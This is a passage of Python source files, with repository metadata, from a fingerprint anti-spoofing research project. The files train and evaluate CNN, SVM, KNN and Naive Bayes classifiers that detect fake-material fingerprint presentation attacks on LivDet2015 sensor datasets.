x.view(x.size(0), -1)\n \n h_list = () \n for layer in range(N_FC):\n x = self.classifier[layer](x)\n h_list += x, \n \n return (conv_list, h_avgpool, h_list)\n \n def predict(self, x):\n #probabilities of each class\n conv_list, h_avgpool, h_list = self.forward(x)\n probs = F.softmax(h_list[-1], dim=1)\n \n return probs\n\n\nif __name__ == '__main__':\n \n import os\n os.getcwd()\n os.chdir(\"../\")\n os.getcwd()\n 
print(os.getcwd())\n\n print()\n if torch.cuda.is_available():\n DEVICE = torch.device(\"cuda:0\") \n print(\"Running on the GPU...\")\n else:\n DEVICE = torch.device(\"cpu\")\n print(\"Running on the CPU...\")\n print()\n \n\n model = CNN2_FPAD().to(DEVICE)\n\n print(model)\n" }, { "alpha_fraction": 0.4909035265445709, "alphanum_fraction": 0.5070523023605347, "avg_line_length": 36.48850631713867, "blob_id": "8abcf1ef53abaa5cde469710f186bebbdfbe9f46", "content_id": "326728bc7999c03b37aeb9af7412c5a37cdcb681", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19568, "license_type": "no_license", "max_line_length": 113, "num_lines": 522, "path": "/SVM_KNN_NB/unseen_attack.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "from PIL import Image\nimport glob\nfrom skimage import color\nfrom skimage.feature import local_binary_pattern\nimport numpy as np\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.model_selection import cross_val_score \nfrom sklearn.metrics import roc_curve \nfrom sklearn.metrics import roc_auc_score\nimport math\n \n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef fpad_iso_metrics(ground_truth, prediction, probs):\n \n P = np.sum(ground_truth)\n N = len(ground_truth) - np.sum(ground_truth)\n \n TP = 0\n FP = 0\n TN = 0\n FN = 0\n\n for i in range(len(prediction)): \n if ground_truth[i]==prediction[i]==1:\n TP += 1\n if prediction[i]==1 and ground_truth[i]!=prediction[i]:\n FP += 1\n if ground_truth[i]==prediction[i]==0:\n TN += 1\n if prediction[i]==0 and ground_truth[i]!=prediction[i]:\n FN += 1\n \n APCER = FN/P #FALSE NEGATIVE RATE (fnr at a defined treshold)\n BPCER = FP/N #FALSE POSITIVE RATE (fpr at a defined treshold)\n \n fpr, tpr, thresholds = roc_curve(ground_truth, probs) \n fnr = 1 - tpr\n \n BPCER25=fpr[(np.abs(fnr - 
0.04)).argmin()] #closest to 4\n \n DETC = [fpr, fnr, tpr] \n \n EER = fpr[np.nanargmin(np.absolute((fnr - fpr)))]\n \n AUROC = roc_auc_score(ground_truth, probs)\n \n return(APCER, BPCER, BPCER25, DETC, EER, AUROC)\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef frange(start, stop=None, step=None):\n\n num = start\n _list = []\n while num <= stop:\n _list.append(num)\n num = num + step\n \n return _list\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef normalize(x, minimum=-1, maximum=-1):\n min_max = []\n if minimum == -1 or maximum == -1:\n from sklearn.preprocessing import normalize\n norm_x = normalize(x[:,np.newaxis], axis=0).ravel()\n min_max.append(min(norm_x))\n min_max.append(max(norm_x))\n return np.array(min_max), norm_x\n else:\n norm_x=[]\n for i in range(len(x)):\n norm_x.append((x[i]-min(x))/(max(x)-min(x)) * (maximum-minimum) + minimum)\n return np.array(norm_x)\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n\ndef unseenAttack(DATASET, croped=False):\n \n PATH = 'C:/Users/Asus/Desktop/5_Ano/5_FPAD/Dataset/'\n \n if DATASET=='CrossMatch':\n files = '/*.bmp'\n percentage = 0.33\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n elif DATASET=='Digital_Persona':\n files = '/*.png'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='GreenBit':\n files = '/*.png'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n elif DATASET=='Hi_Scan':\n files = '/*.bmp'\n percentage = 0.25\n materials = ['Ecoflex_00_50', 'Gelatine', 'Latex', 'WoodGlue']\n else: #Time_Series\n files = '/*.bmp'\n percentage = 0.33\n materials = ['Body_Double', 'Ecoflex', 'Playdoh']\n \n if croped == False:\n print(\"\\nRunning unseen-attack on {}...\\n\".format(DATASET))\n live_path = '/Live'\n fake_path = '/Fake/'\n seg = 'Without_segmentation/'\n #txt = DATASET + 
'_withoutSegmentation_Int.txt'\n #txt = DATASET + '_withoutSegmentation_LBP.txt'\n txt = DATASET + '_withoutSegmentation_IntLBP.txt'\n else:\n files = '/*.png'\n print(\"\\nRunning unseen-attack with segmentation on {}...\\n\".format(DATASET))\n live_path = '/Live_c'\n fake_path = '/Fake_c/'\n seg = 'Segmentation/'\n #txt = DATASET + '_withSegmentation_Int.txt'\n #txt = DATASET + '_withSegmentation_LBP.txt'\n txt = DATASET + '_withSegmentation_IntLBP.txt'\n \n num_clf = 3 \n num_materials = (len(materials))\n \n \n radius = 1\n n_points = 8 * radius\n METHOD = 'uniform' \n \n #print(\"Processing live images...\\n\") \n \n intensity_feature = []\n LBP_feature = []\n label = []\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + live_path + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_feature.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_feature.append(hist2.tolist())\n label.append(0)\n \n\n intensity_feature = np.array(intensity_feature)\n LBP_feature = np.array(LBP_feature)\n label = np.array(label)\n \n #X = intensity_feature\n #X = LBP_feature\n X = np.hstack((intensity_feature, LBP_feature))\n\n y = label\n \n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=percentage, random_state=42)\n \n APCER = np.ones((num_clf, num_materials))\n BPCER = np.ones((num_clf, num_materials))\n BPCER25 = np.ones((num_clf, num_materials))\n EER = np.ones((num_clf, num_materials))\n AUROC = np.ones((num_clf, num_materials))\n \n DETC_svm = []\n DETC_nb = []\n DETC_knn = []\n\n \n # TEST/TRAIN SPOOF + CLASSIFICATION + METRICS ------------------------------------------------------------\n \n for unseen in range(0, len(materials)):\n \n print(\"\\n*UNSEEN ATTACK NUMBER {} OF 
{}*\\n\".format(unseen+1, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n intensity_attack = []\n LBP_attack = []\n label_attack = []\n \n for k in range(0, len(materials)): \n \n if k==unseen:\n \n material=materials[k]\n \n #print(\"\\n*ATTACK NUMBER {} OF {}*\\n\".format(attack, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n intensity_test = []\n LBP_test = []\n label_test = []\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_test.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_test.append(hist2.tolist())\n label_test.append(1)\n \n intensity_test = np.array(intensity_test)\n LBP_test = np.array(LBP_test)\n label_test = np.array(label_test) \n \n else:\n \n material=materials[k]\n \n #print(\"\\n*ATTACK NUMBER {} OF {}*\\n\".format(attack, len(materials)))\n #print(\"Processing spoof images...\\n\")\n \n for filename in glob.glob(PATH + 'LivDet2015/train/' + DATASET + fake_path + material + files):\n with Image.open(filename) as img:\n if DATASET=='Digital_Persona':\n img = color.rgb2gray(np.array(img))\n else:\n img = np.array(img)\n hist1, bin_edges1 = np.histogram(img, density=True)\n intensity_attack.append(hist1.tolist())\n lbp = local_binary_pattern(img, n_points, radius, METHOD)\n hist2, bin_edges2 = np.histogram(lbp, density=True)\n LBP_attack.append(hist2.tolist())\n label_attack.append(1)\n \n \n #print(\"------------------------------\")\n #print(\"-> Concluding data preparation...\\n\")\n #################################################\n \n intensity_attack = np.array(intensity_attack)\n LBP_attack = np.array(LBP_attack)\n label_attack = np.array(label_attack) \n \n #X 
= intensity_attack\n #X = LBP_attack\n X = np.hstack((intensity_attack, LBP_attack))\n \n X_train = np.vstack((X_train, X))\n y = label_attack\n y_train = np.array(y_train.tolist() + y.tolist())\n \n #################################################\n intensity_test = np.array(intensity_test)\n LBP_test = np.array(LBP_test)\n label_test = np.array(label_test) \n \n #X = intensity_test\n #X = LBP_test\n X = np.hstack((intensity_test, LBP_test))\n \n X_test = np.vstack((X_test, X))\n \n y = label_test\n y_test = np.array(y_test.tolist() + y.tolist()) \n \n #print(\"-> Data normalization...\\n\")\n for i in range(X_train.shape[1]):\n min_max, X_train[:,i] = normalize(X_train[:,i])\n X_test[:,i] = normalize(X_test[:,i], min_max[0], min_max[1]) \n \n '''\n from sklearn.svm import SVC\n from sklearn.model_selection import GridSearchCV\n c_ = list(range(-2 ,2))\n c_list = []\n for c in c_:\n c_list.append(math.pow(10, c))\n d_list = [1, 2, 3, 4, 5]\n \n parameters = {'kernel':('linear', 'rbf', 'poly', 'sigmoid'), 'C':c_list, 'degree':d_list}\n svc = SVC(probability=True)\n svm = GridSearchCV(svc, parameters)\n svm.fit(X_train, y_train)\n svm.score(X_train, y_train)\n y_pred_svm = svm.predict(X_test)\n probs_svm = svm.predict_proba(X_test)\n probs_svm = probs_svm[:, 1] \n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_svm, probs_svm)\n APCER[0, unseen] = a\n BPCER[0, unseen] = b \n BPCER25[0, unseen] = c \n DETC_svm.append(d)\n EER[0, unseen] = e \n AUROC[0, unseen] = f\n '''\n \n \n # -> SVM --------------------------------------------------------------------------\n #print(\"-> SVM learning and otimization...\")\n from sklearn.svm import SVC\n kernel_list = ['linear', 'poly', 'rbf', 'sigmoid']\n c_list = list(range(-2 ,2))\n d_list = [1, 2, 3, 4, 5]\n _g = 1/(X_train.shape[1])\n otimization_svm = np.ones((len(kernel_list), len(d_list), len(c_list)))\n for _kernel in list(enumerate(kernel_list)):\n for _d in list(enumerate(d_list)):\n for _c in 
list(enumerate(c_list)):\n svm = SVC(C=math.pow(10, _c[1]), kernel=_kernel[1], degree=_d[1], gamma = 'auto')\n scores = cross_val_score(svm, X_train, y_train, cv=5)\n otimization_svm[_kernel[0], _d[0], _c[0]] = scores.mean()\n \n #print(\"SVM score = {}\".format(np.amax(otimization_svm)))\n result = np.where(otimization_svm == np.amax(otimization_svm))\n listOfCordinates = list(zip(result[0], result[1], result[2]))\n best_kernel = kernel_list[listOfCordinates[0][0]]\n best_d = d_list[listOfCordinates[0][1]]\n best_c = c_list[listOfCordinates[0][2]]\n \n print(\"SVM -> best kernel={}, C={} and degree={}\".format(best_kernel, best_c, best_d))\n \n svm = SVC(C=math.pow(10, best_c), kernel=best_kernel, degree=best_d, probability=True)\n svm.fit(X_train, y_train)\n \n \n y_train_svm = svm.predict(X_train)\n probs_train_svm = svm.predict_proba(X_train)\n probs_train_svm = probs_train_svm[:, 1]\n apcer, bpcer, c, d, eer, f = fpad_iso_metrics(y_train, y_train_svm, probs_train_svm)\n print(\"Train:\\nApcer={}\\nBPCER={}\\nEER={}\".format(apcer, bpcer, eer))\n \n \n y_pred_svm = svm.predict(X_test)\n probs_svm = svm.predict_proba(X_test)\n probs_svm = probs_svm[:, 1]\n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_svm, probs_svm)\n APCER[0, unseen] = a\n BPCER[0, unseen] = b \n BPCER25[0, unseen] = c \n DETC_svm.append(d)\n EER[0, unseen] = e \n AUROC[0, unseen] = f\n \n \n '''\n # -> NAIVE BAYES ------------------------------------------------------------------\n #print(\"-> Naive Bayes learning...\")\n from sklearn.naive_bayes import GaussianNB\n nb = GaussianNB()\n scores = cross_val_score(nb, X_train, y_train, cv=5)\n #print(\"NB score = {}\".format(scores.mean()))\n nb.fit(X_train, y_train)\n y_pred_nb = nb.predict(X_test)\n probs_nb = nb.predict_proba(X_test)\n probs_nb = probs_nb[:, 1] \n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_nb, probs_nb)\n APCER[1, unseen] = a\n BPCER[1, unseen] = b \n BPCER25[1, unseen] = c \n DETC_nb.append(d) \n EER[1, 
unseen] = e \n AUROC[1, unseen] = f\n \n # -> KNN ------------------------------------------------------------------\n #print(\"-> KNN learning...\")\n from sklearn.neighbors import KNeighborsClassifier\n weights_list = ['uniform', 'distance']\n k_list = range(1, 10)\n otimization_knn = np.ones((len(k_list), len(weights_list)))\n for _w in list(enumerate(weights_list)):\n for _k in list(enumerate(k_list)):\n knn = KNeighborsClassifier(n_neighbors=_k[1], weights=_w[1])\n scores = cross_val_score(knn, X_train, y_train, cv=5)\n otimization_knn[_k[0], _w[0]] = scores.mean()\n \n #print(\"KNN score = {}\".format(np.amax(otimization_knn)))\n result = np.where(otimization_knn == np.amax(otimization_knn))\n listOfCordinates = list(zip(result[0], result[1]))\n best_k = k_list[listOfCordinates[0][0]]\n best_weight = weights_list[listOfCordinates[0][1]]\n \n #print(\"Otimization result -> k={} and weight={}\".format(best_k, best_weight))\n #print(\"------------------------------\")\n \n knn = KNeighborsClassifier(n_neighbors=best_k, weights=best_weight)\n knn.fit(X_train, y_train)\n y_pred_knn = knn.predict(X_test)\n probs_knn = knn.predict_proba(X_test)\n probs_knn = probs_knn[:, 1] \n \n a, b, c, d, e, f = fpad_iso_metrics(y_test, y_pred_knn, probs_knn)\n APCER[2, unseen] = a\n BPCER[2, unseen] = b\n BPCER25[2, unseen] = c\n DETC_knn.append(d)\n EER[2, unseen] = e\n AUROC[2, unseen] = f\n '''\n\n DETC = []\n DETC.append(DETC_svm)\n DETC.append(DETC_nb)\n DETC.append(DETC_knn) \n \n \n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_APCER_\"+ txt, APCER, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_BPCER_\"+ txt, BPCER, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_BPCER25_\"+ txt, BPCER25, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_AUROC_\"+ txt, AUROC, fmt=\"%.3f\")\n #np.savetxt(\"../Results/\" + 
DATASET + \"/Unseen_attack/\" + seg + \"UNSEEN_EER_\"+ txt, EER, fmt=\"%.3f\")\n \n metrics = [APCER, BPCER, BPCER25, AUROC, EER, DETC]\n \n return metrics\n\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n \ndef getPlots(DETC, num_materials, path):\n\n \n svm = DETC[0]\n nb = DETC[1]\n knn = DETC[2]\n \n from matplotlib import pyplot as plt\n plt.ioff()\n \n fig,ax = plt.subplots(2,num_materials)\n fig.suptitle(\"{}/Int\".format(path))\n \n for i in range(num_materials):\n \n x1 = svm[i][0] #fpr\n y1 = svm[i][1] #fnr\n z1 = svm[i][2] #tpr\n \n x2 = nb[i][0]\n y2 = nb[i][1]\n z2 = nb[i][2] \n \n x3 = knn[i][0]\n y3 = knn[i][1]\n z3 = knn[i][2] \n \n ax[0,i].plot(x1,z1, \"-r\", label=\"SVM\")\n ax[0,i].plot(x2,z2, \"-g\", label=\"NB\")\n ax[0,i].plot(x3,z3, \"-b\", label=\"KNN\")\n ax[0,i].plot([0, 1], [0, 1], color='black', linestyle='--')\n ax[0,i].set_title('ROC - Material {}'.format(i+1))\n ax[0,i].legend(loc=\"lower right\")\n \n ax[1,i].axis_min = min(x1[0],y1[-1])\n ax[1,i].plot(x1,y1, \"-r\", label=\"SVM\")\n ax[1,i].plot(x2,y2, \"-g\", label=\"NB\")\n ax[1,i].plot(x3,y3, \"-b\", label=\"KNN\")\n ax[1,i].set_title('DET - Material {}'.format(i+1))\n ax[1,i].legend(loc=\"upper right\")\n \n \n for a in ax[0,:]:\n a.set(xlabel='', ylabel='True Positive Rate')\n\n \n from matplotlib.ticker import FormatStrFormatter \n ticks_to_use = [0.001,0.002,0.005,0.01,0.02,0.05,0.1,0.2,0.5,1,2] \n for a in ax[1,:]:\n a.set(xlabel='BPCER (False Positive Rate)', ylabel='APCER (False Negative Rate)')\n a.label_outer()\n a.set_yscale('log')\n a.set_xscale('log')\n a.get_xaxis().set_major_formatter(FormatStrFormatter('%.2f'))\n a.get_yaxis().set_major_formatter(FormatStrFormatter('%.2f'))\n a.set_xticks(ticks_to_use)\n a.set_yticks(ticks_to_use)\n a.axis([0.001,2,0.001,2])\n \n\n manager = plt.get_current_fig_manager()\n manager.window.showMaximized()\n 
plt.show()\n\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n#||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||\n \nimport datetime\n\n# CrossMatch | Digital_Persona | GreenBit | Hi_Scan | Time_Series\n \n#CrossMatch_metrics = unseenAttack('CrossMatch_TESTS', croped=False)\n#CrossMatch_metrics = unseenAttack('Digital_Persona_TESTS', croped=False)\n\nprint(datetime.datetime.now()) \n\n#CrossMatch_metrics = unseenAttack('CrossMatch', croped=False)\n\nDigital_Persona_metrics = unseenAttack('Digital_Persona', croped=False) \nGreenBit_metrics = unseenAttack('GreenBit', croped=False) \nHi_Scan_metrics = unseenAttack('Hi_Scan', croped=False)\nTime_Series_metrics = unseenAttack('Time_Series', croped=False)\n\nCrossMatch_seg_metrics = unseenAttack('CrossMatch', croped=True) \nHi_Scan_seg_metrics = unseenAttack('Hi_Scan', croped=True)\nTime_Series_seg_metrics = unseenAttack('Time_Series', croped=True)\n\n'''\ngetPlots(CrossMatch_metrics[5], 3, 'CrossMatch/Unseen_attack/Without_segmentation')\ngetPlots(Digital_Persona_metrics[5], 4, 'Digital_Persona/Unseen_attack/Without_segmentation')\ngetPlots(GreenBit_metrics[5], 4, 'GreenBit/Unseen_attack/Without_segmentation')\ngetPlots(Hi_Scan_metrics[5], 4, 'Hi_Scan/Unseen_attack/Without_segmentation')\ngetPlots(Time_Series_metrics[5], 3, 'Time_Series/Unseen_attack/Without_segmentation')\n\ngetPlots(CrossMatch_seg_metrics[5], 3, 'CrossMatch/Unseen_attack/Segmentation')\ngetPlots(Hi_Scan_seg_metrics[5], 4, 'Hi_Scan/Unseen_attack/Segmentation')\ngetPlots(Time_Series_seg_metrics[5], 3, 'Time_Series/Unseen_attack/Segmentation')\n'''\nprint(datetime.datetime.now())" }, { "alpha_fraction": 0.49561619758605957, "alphanum_fraction": 0.5177832841873169, "avg_line_length": 31.071617126464844, "blob_id": 
"dd39cbc553a6b8101737a80b22522e9a60b693bb", "content_id": "b6308c46ad2ef4135608270ef31a67d93918fbaf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12090, "license_type": "no_license", "max_line_length": 151, "num_lines": 377, "path": "/CNNreg/data/data_cnn2.py", "repo_name": "joao-afonso-pereira/Fingerprint-Antispoofing-Domain-Adaptation-and-Adversarial-Learning", "src_encoding": "UTF-8", "text": "import torch\nfrom torch.utils.data import Dataset\nimport scipy.io as sio\nimport os\nimport numpy as np\nimport copy\nfrom sklearn.model_selection import train_test_split\nfrom torchvision import transforms\nimport sys\nfrom PIL import Image\nfrom PIL import ImageOps\n\nclass numpyToTensor(object):\n \"\"\"Convert ndarrays in sample to Tensors.\"\"\"\n\n def __call__(self, sample):\n return torch.from_numpy(sample).float()\n \n#%% SPECIFICATIONS -------------------------------------------------------------------------------------------------\n\nBATCH_SIZE = 12 \n\n#Image dimensions\nMIN_CROP_WIDTH = -1\nMIN_CROP_HEIGHT = -1\n\n#%% Get Data Loaders -------------------------------------------------------------------------------------------------\n#\n# Input: \n# - [STR] path (of the images)\n# - [STR] dataset (CrossMatch, Digital_Persona, GreenBit, Hi_Scan, Time_Series)\n# - [INT] test_material (material id to use for testing - 0, 1 or 2 for CrossMatch and Time_Series | 0, 1, 2 or 3 for the remaining datasets)\n# - [BOOL] croped (True to use the previously segmented and cropped images)\n# - [BOOL] unseen_attack (True to create a test dataset with an unseen attack using the test material)\n#\n# Output: \n# - train, validation and test data loaders\n\ndef get_data_loaders(path, dataset, test_material, croped=True, unseen_attack=False):\n \n global MIN_CROP_WIDTH \n global MIN_CROP_HEIGHT \n global BATCH_SIZE\n\n sensor = dataset\n \n if unseen_attack==True:\n \n if dataset == \"CrossMatch\":\n\n #attack materials 
idxs and names\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(1000))\n real_test = np.array(range(1000, 1500))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n \n elif dataset == \"Digital_Persona\":\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n #dimensions\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n\n elif dataset == \"GreenBit\":\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 997))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n\n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 10 #smaller batch size because of memory issues\n\n #attack materials idxs and names\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(750))\n real_test = np.array(range(750, 1000))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n\n elif dataset == \"Time_Series\":\n\n #attack materials idxs and names\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n #real image idxs in the dataset\n real_train = np.array(range(2960))\n real_test = np.array(range(2960, 4440))\n\n #dimensions\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n\n else:\n sys.exit(\"Error: incorrect dataset!\")\n \n \n train_materials = np.delete(materials_list, test_material) #train_materials = materials - test_material (unseen-attack)\n \n data = FPAD(path, dataset, material_idx=train_materials, 
real_idx=real_train, croped=croped)\n data_test = FPAD(path, dataset, material_idx=[test_material], real_idx=real_test, croped=croped)\n \n train_size = int(0.8 * len(data))\n val_size = len(data) - train_size\n data_train, data_val = torch.utils.data.random_split(data, [train_size, val_size])\n \n else:\n \n if dataset == \"CrossMatch\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=1500, size=500)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 247\n\n elif dataset == \"Digital_Persona\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n MIN_CROP_WIDTH = 224\n MIN_CROP_HEIGHT = 235\n\n elif dataset == \"GreenBit\":\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=997, size=250)\n \n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 271\n\n elif dataset == \"Hi_Scan\":\n\n BATCH_SIZE = 10\n\n materials_list = [0,1,2,3]\n materials_name = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n real_train = np.random.randint(low=0, high=1000, size=250)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 311\n\n elif dataset == \"Time_Series\":\n\n materials_list = [0,1,2]\n materials_name = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n\n real_train = np.random.randint(low=0, high=4440, size=1480)\n\n MIN_CROP_WIDTH = 225\n MIN_CROP_HEIGHT = 225\n\n else:\n sys.exit(\"Error: incorrect dataset!\") \n \n \n train_materials = [test_material] #one-attack = just one material to train and to test\n \n dataset = FPAD(path, dataset, material_idx=train_materials, real_idx=real_train, croped=croped)\n \n train_size = int(0.8 * len(dataset))\n test_size = len(dataset) - train_size\n _dataset, data_test = torch.utils.data.random_split(dataset, [train_size, test_size])\n 
\n train_size = int(0.8 * len(_dataset))\n val_size = len(_dataset) - train_size\n data_train, data_val = torch.utils.data.random_split(_dataset, [train_size, val_size])\n \n #Print info about datasets\n print('\\n--------------------------------------')\n print('Dataset: ' + sensor)\n print('Train materials: ', end=\"\")\n for material in train_materials:\n print(materials_name[material], end=\" \")\n print('\\nTest material: {}'.format(materials_name[test_material]))\n \n #Params of the data loaders\n params = {'batch_size': BATCH_SIZE,\n 'shuffle': True,\n 'num_workers': 0} \n \n #Data loaders\n train_loader = torch.utils.data.DataLoader(data_train, **params)\n valid_loader = torch.utils.data.DataLoader(data_val, **params)\n test_loader = torch.utils.data.DataLoader(data_test, **params)\n\n #Print info about data loaders\n print('\\nDatasets size: Train {}, Val {}, Test {}'.format(len(data_train),\n len(data_val),\n len(data_test)))\n \n return train_loader, valid_loader, test_loader\n\n#%% DATASET -------------------------------------------------------------------------------------------------------\n\nIMG_HEIGHT = -1 \nIMG_WIDTH = -1 \n\nclass FPAD(Dataset):\n def __init__(self,\n PATH,\n dataset,\n material_idx,\n real_idx,\n croped = True):\n\n self.material_idx = material_idx\n self.real_idx = real_idx\n self.dataset = dataset\n self.croped = croped\n \n if dataset == \"CrossMatch\" or dataset==\"Time_Series\":\n self.materials = [\"Body_Double\", \"Ecoflex\", \"Playdoh\"]\n else:\n self.materials = [\"Ecoflex_00_50\", \"WoodGlue\", \"Gelatine\", \"Latex\"]\n\n # Initialize X (data), y (real=1, fake=0), and f (fake material id) arrays\n X = []\n y = []\n f = []\n f_norm = []\n \n #PRESENTATION ATTACK SAMPLES\n \n count = 0\n \n index_norm = 0\n \n for index in self.material_idx: \n \n if croped == False:\n self.fake_dir = PATH + dataset + \"/Fake/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path = PATH + dataset + \"/\" + 
self.materials[index] + \".txt\"\n else:\n self.fake_dir = PATH + dataset + \"/Fake_c/\" + self.materials[index] + \"/\"\n # read fake names\n txt_path= PATH + dataset + \"/\" + self.materials[index] + \"_c.txt\"\n \n with open(txt_path, 'r') as file:\n fake_names = file.readlines()\n \n count = count + len(fake_names)\n \n X.extend(fake_names)\n y.extend([1]*len(fake_names))\n \n f.extend([index]*len(fake_names))\n f_norm.extend([index_norm]*len(fake_names))\n \n index_norm = index_norm + 1\n \n self.n_presentation_attack_samples = count\n\n #BONAFIDE SAMPLES\n \n if croped == False:\n path = PATH + dataset + \"/real.txt\"\n else:\n path = PATH + dataset + \"/real_c.txt\"\n \n # read real names\n with open(path, 'r') as file:\n real_names = file.readlines()\n \n real_names = np.array(real_names)\n \n self.n_bonafide_samples = self.real_idx.shape[0]\n \n real_names = real_names[self.real_idx] \n\n # append real_data to X, y, and f arrays\n X.extend(real_names)\n y.extend([0]*self.n_bonafide_samples)\n f.extend([-1]*self.n_bonafide_samples)\n f_norm.extend([-1]*self.n_bonafide_samples)\n\n self.X = np.array(X)\n self.y = np.array(y)\n self.f = np.array(f)\n self.f_norm = np.array(f_norm)\n\n def __len__(self):\n return len(self.y)\n\n def __getitem__(self, idx):\n \n if torch.is_tensor(idx):\n idx = idx.tolist()\n \n img_name = self.X[idx]\n\n \n sample = Image.open(img_name.rstrip())\n width, height = sample.size\n \n \n if self.croped == True: \n \n \n sample = Image.fromarray(np.uint8(sample))\n width, height = sample.size\n \n \n left = int((width-MIN_CROP_WIDTH)/2)\n right = width - MIN_CROP_WIDTH - left\n top = int((height-MIN_CROP_HEIGHT)/2)\n bottom = height - MIN_CROP_HEIGHT - top\n \n sample = ImageOps.crop(sample, (left, top, right, bottom)) \n \n transformation = self.transformations()\n \n sample = np.array(sample)\n \n \n \n if self.dataset == \"Digital_Persona\":\n \n sample = sample[:,:,0]\n sample = np.transpose(sample)\n \n \n sample.reshape((1, 
